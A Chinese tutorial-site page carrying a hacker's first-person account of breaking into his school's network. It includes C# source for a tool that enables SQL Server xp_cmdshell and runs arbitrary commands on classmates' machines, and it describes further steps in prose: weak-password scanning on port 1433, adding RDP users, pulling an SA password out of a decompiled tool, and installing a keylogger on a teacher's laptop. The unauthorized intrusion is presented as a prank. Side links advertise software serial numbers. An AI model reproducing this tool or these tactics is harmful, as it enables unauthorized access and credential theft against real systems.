- 1PS提示:因為圖層已鎖定,無法編輯圖層的處理方法
- 2picacg蘋果版怎么找不到|picacg ios版是不是下架了介紹
- 3Adobe Illustrator CS5 序列號大全
- 4ACDsee注冊碼免費分享(含ACDsee18、ACDsee10等版本)
- 5Potato(土豆聊天)怎么換頭像|Potato app更改頭像方法介紹
- 6Potato(馬鈴薯聊天)怎么注冊不了|Potato不能注冊處理方法介紹
- 7PDF瀏覽器能看3D文件嗎?PDF瀏覽器看3D文件圖文詳細教程
- 8最新的Adobe Illustrator CS4序列號大全
- 9Intel i7-9700K性能跑分曝光:同代提升約12%
- 10Intel Z390主板有望10月8日公布:8核9代酷睿隨后登場
- 11XP系統怎么清除緩存?
- 12UG10.0繪制立體管道零件圖文詳細教程
[摘要]作者:Trojan [ESST] 噩靈戰隊[Evil-Soul Security Team] 最近一直沒時間寫文章給大家,主要是因為我在北大青鳥上學,學習軟件開發.時間少的要命.既然是玩黑的就...
作者:Trojan [ESST] 噩靈戰隊[Evil-Soul Security Team]
最近一直沒時間寫文章給大家,主要是因為我在北大青鳥上學,學習軟件開發.時間少的要命.既然是玩黑的就要簡單在青鳥內網滲透下.
簡單介紹下青鳥的機房怎么安排的.一共6個機房,一個公用機房.老師辦公室人手一個筆記本.六個機房的學生機器是類似這樣的IP:192.168.1.x 不可以上網.機房里的教員機器(也就是老師的機器)有兩個IP.一個是192.168.1.x,一個是192.168.0.x,為什么要弄成0.x呢,主要是辦公室的機器IP是192.168.0.x的一人只有一個IP.老師在講課的時候在機房要遠程登陸自己的機器,也就是0.x的.里面有老師的講課的PPT之類的東西.學校有一個FTP服務器是192.168.1.253這個IP.每個學員都有自己的FTP帳戶(密碼空,只有寫入權限).教師有一個帳戶,帳號是teacher密碼我就不知道了.當學員想清理自己的FTP的時候就找老師..大概就是這個情況..
那天上課的時候無聊.想這搞搞同學的機器.每個學員都是administrator權限.sql server的SA密碼統一123.直接利用xpcmdshell加一個shutdown-p就惡搞了他們幾天.S1快畢業的時候有一節復習課.我和D38k70p同學就用C#寫了個工具.為了方便惡搞..
簡單發下C#的關鍵代碼給大家研究:
private void btnGo_Click(object sender, EventArgs e)
{
try
{
//打開數據庫
DBHelper.conn.Open();
//定義sql語句
string sql = "EXEC sp_configure 'xp_cmdshell',0 RECONFIGURE EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
SqlCommand comm = new SqlCommand(sql, DBHelper.conn);
try
{
comm.ExecuteNonQuery();
}
catch
{
comm.ExecuteNonQuery();
}
sql = string.Format("EXEC xp_cmdshell '{0}'", this.txtCmd.Text);
comm.CommandText = sql;
try
{
comm.ExecuteNonQuery();
}
catch
{
comm.ExecuteNonQuery();
}
SqlDataReader dr = comm.ExecuteReader();
while(dr.Read())
{
txtReturn.Text = txtReturn.Text + "\r\n" + dr[0].ToString();
}
dr.Close();
}
finally
{
DBHelper.conn.Close();
}
}
private void comboBox1_SelectedIndexChanged(object sender, EventArgs e)
{
//幾個猥瑣的命令
switch (this.comboBox1.Text)
{
case "瞬間關機":
this.txtCmd.Text = "shutdown -p";
break;
case "30秒關機":
this.txtCmd.Text = "shutdown -r";
break;
case "注銷":
this.txtCmd.Text = "shutdown -f";
break;
}
}
private void btnEixt_Click(object sender, EventArgs e)
{
Application.Exit();
}
private void button1_Click(object sender, EventArgs e)
{
try
{
Ping pingSender = new Ping();
PingReply reply = pingSender.Send(txtIp.Text);
if (reply.Status == IPStatus.Success)
{
MessageBox.Show("Success");
}
else
{
MessageBox.Show("Fail");
}
}
catch(Exception ex)
{
MessageBox.Show(ex.Message);
}
}
private void btnLoginTest_Click(object sender, EventArgs e)
{
if (sqlConn())
{
MessageBox.Show("OK,U can kill him");
}
else
{
MessageBox.Show("The Password is wrong!");
}
}
public bool sqlConn()
{
ip = string.Format("Data Source={0};Database=master;user id ={1} ;pwd ={2}", this.txtIp.Text,txtUser.Text,txtPwd.Text);
DBHelper.conn = new SqlConnection(ip);
try
{
DBHelper.conn.Open();
return true;
}
catch
{
return false;
}
}
private void button2_Click(object sender, EventArgs e)
{
this.txtReturn.Text = "";
}
}
}
復制代碼工具有了,可以開個3389加個用戶啥的..通殺6個機房的學員機器.
但是機房的教員機器還沒控制呢..不知道IP是多少.突然有一天在2機房老師架設了IIS叫我們用反射給程序實現在線升級的功能.我這一看IP是1.242.老師的IP肯定有規律的一機房的教師機是1.241,二機房的教師機IP是1.242,就是這個了..這樣的話可以利用拿到教員機器的3389在去遠程登陸老師的筆記本..老師的筆記本還是外網的.可以抓個肉雞..
不知道教員機器SA密碼是啥.于是找了個工具開始掃1433弱口令..掃了老半天終于掃到了..可以拿到3389了.過了幾天,D38k70p童鞋不知道從哪個娃的FTP找到了一個清理FTP工具.我一看真好使..在坐車回家的路上和D38k70p童鞋討論那個工具的原理.大概作者不是知道了teacher的密碼就是sql的密碼..回到家D38k70p就用Xenocode Fox 2007反匯編那個清理FTP工具..直接找到SA密碼..第二天成功拿到服務器的權限..D38k70p童鞋說,既然搞了就把老師的筆記本也搞掉..我說好.上機的時候用最快的速度把老師的機器拿到權限.放個鍵盤記錄工具...就這樣拿到了教師的筆記本.校長室的筆記本就算了
上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。
推薦資訊 總人氣榜
最新教程 本月人氣
- 1能拍出貓耳朵的拍照軟件怎么玩?拍照軟件faceu臉萌使用方法
- 2最新的、有效果的photoshop cs2 激活碼分享
- 3photoshop cs2怎么激活?photoshop cs2激活圖文詳細教程
- 4solidworks工程圖轉PDF時出現字體亂碼時的處理方法
- 5Indesign參考線怎么使用?Indesign參考線的使用方法介紹
- 6InDesign怎么排文字?InDesign排文字的方法流程
- 7photoshop cs2圖文詳細教程:photoshop cs2怎么安裝與激活?
- 8photoshop cs2 序列號分享與安裝序列號圖文詳細教程
- 9有效果的photoshop cs2序列號免費分享
- 10photoshop cs2 注冊機怎么使用?
- 11photoshop7.0圖文詳細教程:photoshop7怎么安裝?
- 12photoshop7.0序列號大全
- 1紅米3什么時候上市 紅米3上市時間
- 2晃臉怎么刪除作品|晃臉刪除視頻方法介紹
- 3XP系統怎么安裝無線網卡驅動?
- 4芒果tv會員賬號共享2017.5.27芒果tv最新共享vip會員賬號更新
- 5vivo x5pro與魅族mx4哪一個好 魅族mx4與vivo x5pro比較
- 6vivo x5pro與魅族mx4pro哪一個好 魅族mx4pro與vivo x5pro比較
- 7vivo x5pro與魅藍metal哪一個好 魅藍metal與vivo x5pro比較
- 8紅米note3什么時候公布 紅米note3公布時間
- 93星galaxy s7edge設置怎么 3星s7edge設置參數
- 10紅米3價格多少錢 紅米3手機報價
- 11紅米3設置怎么 紅米3設置參數
- 123星galaxy s7edge價格多少錢 3星galaxy s7edge報價
